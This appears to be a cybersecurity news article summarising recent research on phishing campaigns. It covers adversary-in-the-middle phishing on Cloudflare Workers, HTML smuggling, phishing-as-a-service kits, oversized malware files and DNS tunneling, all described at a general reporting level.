Cybersecurity researchers are warning about a phishing campaign that is exploiting Cloudflare Workers to serve up phishing sites used to harvest user credentials related to Microsoft, Gmail, Yahoo!, and cPanel Webmail.
The attack technique, known as transparent phishing, or man-in-the-middle (AitM) phishing, “uses Cloudflare Workers as a reverse proxy server for the legitimate login page to intercept traffic between the victim and the login page and steal credentials, cookies, and tokens,” Netskope researcher Jan Michael Alcantara wrote in the report.
The majority of phishing campaigns hosted on Cloudflare Workers in the past 30 days targeted victims in Asia, North America, and Southern Europe across the technology, financial services, and banking industries.
The cybersecurity firm noted that an increase in traffic to phishing pages hosted by Cloudflare Workers was first recorded in Q2 2023, with the total number of different domains skyrocketing from just over 1,000 in Q4 2023 to nearly 1,300 in Q1 2024.
The phishing campaign leverages a technique known as HTML smuggling, which involves assembling malicious payloads on the client side using malicious JavaScript to circumvent security protections, and highlights the advanced strategies threat actors are using to deploy and execute attacks against targeted systems.
The difference in this case is that the malicious payload is a phishing page that is reconstructed and presented to the user in their web browser.
Meanwhile, the phishing page prompts victims to sign in with Microsoft Outlook or Office 365 (now Microsoft 365) to view the PDF document. If the victim complies, a fake sign-in page hosted on Cloudflare Workers is used to collect credentials and multi-factor authentication (MFA) codes.
“The entire phishing page is created using a modified version of the open source Cloudflare AitM toolkit,” says Michael Alcantara. “When the victim visits the attacker’s login page, the attacker collects web request metadata.”
“When the victim enters their credentials, they are logged into the legitimate website and the attacker collects the tokens and cookies included in the response. Additionally, the attacker can learn about any additional activity the victim performs after logging in.”
HTML smuggling as a payload delivery mechanism is becoming increasingly favored by threat actors looking to evade modern defenses, allowing them to deliver malicious HTML pages and other malware without raising any warnings.
In one example noted by Huntress Labs, a fake HTML file was used to inject an iframe of a legitimate Microsoft authentication portal retrieved from a domain controlled by the attackers.
“This has the hallmarks of an MFA-bypassing man-in-the-middle proxy phishing attack, but it uses an HTML smuggled payload with an injected iframe rather than a simple link,” security researcher Matt Kiely said.
Another campaign that has garnered attention is invoice-themed phishing emails that contain HTML attachments disguised as PDF viewer login pages, stealing users’ email account credentials and redirecting them to a URL hosting a so-called “proof of payment.”
Email-based phishing attacks have taken many forms in recent years, with attackers leveraging Phishing-as-a-Service (PhaaS) toolkits such as Greatness to steal Microsoft 365 login credentials, using AitM techniques to circumvent MFA, or embedding QR codes within PDF files and using CAPTCHA checks to redirect victims to fake login pages.
Greatness PhaaS has emerged as targeting financial services, manufacturing, energy/utilities, retail and consulting companies in the United States, Canada, Germany, South Korea and Norway as key sectors.
“These services offer advanced capabilities that are attractive to attackers by saving time on development and evasion tactics,” Trellix researchers said.
This development comes as threat actors are constantly looking for new ways to circumvent security systems and spread malware by leveraging generative artificial intelligence (GenAI) to craft effective phishing emails and deliver compressed attachments containing overly large malware payloads (over 100MB in size) to evade analysis.
“Scanning large files may require more time and resources and may slow down overall system performance during the scanning process,” the cybersecurity firm said. “To minimize heavy memory usage, some antivirus engines may set size limits for scanning and skip files that are too large.”
The company added that the file inflation technique has been observed as an attack tactic to deliver additional malware, such as Agent Tesla, AsyncRAT, Quasar RAT, and Remcos RAT.
Additionally, various threat actors are misusing GenAI for exploit development and deepfake generation, highlighting the need for robust security measures, ethical guidelines, and oversight mechanisms.
These innovations to evade traditional detection mechanisms also extend to campaigns such as TrkCdn, SpamTracker, and SecShow, which utilize Domain Name System (DNS) tunneling to monitor when targets open phishing emails or click on malicious links, track the distribution of spam, and scan victim networks for potential vulnerabilities.
“The DNS tunneling technique used in the TrkCdn attacks is intended to track victim interactions with email content,” Palo Alto Networks Unit 42 said in a report published earlier this month, adding that attackers embed content in emails that, when opened, perform DNS queries to attacker-controlled subdomains.
“(SpamTracker) uses emails and website links to deliver spam and phishing content. The goal of these campaigns is to lure victims into clicking on links where threat actors have hidden their payloads in subdomains.”
The findings come amid a surge in malvertising campaigns that leverage malicious advertisements for popular software in search engine results to trick users into installing information stealers and remote access trojans such as SectopRAT (aka ArechClient).
Additionally, bad actors have been seen creating fake pages imitating financial institutions such as Barclays that pretend to offer live chat support and offer legitimate remote desktop software such as AnyDesk, granting them remote access to systems in the process.
